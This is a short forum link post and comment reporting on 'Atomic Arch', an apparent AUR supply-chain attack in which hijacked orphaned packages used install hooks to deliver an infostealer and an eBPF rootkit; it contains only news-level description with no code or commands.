Atomic Arch is a major AUR supply-chain attack (over 1.5K packages affected as of now) where attackers hijacked orphaned Arch packages and used malicious install hooks to pull npm payloads that executed a Linux ELF infostealer. It targeted developer secrets like SSH keys, GitHub/npm tokens, browser sessions, Docker/Vault credentials, and chat app data, while also using an eBPF rootkit to hide itself when run as root.
Atomic Arch: 900+ AUR Packages Backdoored with eBPF RootkitCopy
Submitted 2 days ago by WPSteam@lemmy.world to cybersecurity@infosec.pub
https://thecybersecguru.com/news/atomic-arch-aur-supply-chain-attack-ebpf-rootkit/
UnLocoPoco@lemmy.world 1 day ago
Update: seems like there’s a 2nd wave of attack…a bit more sophisticated than the initial wave…has begun. Code is more obfuscated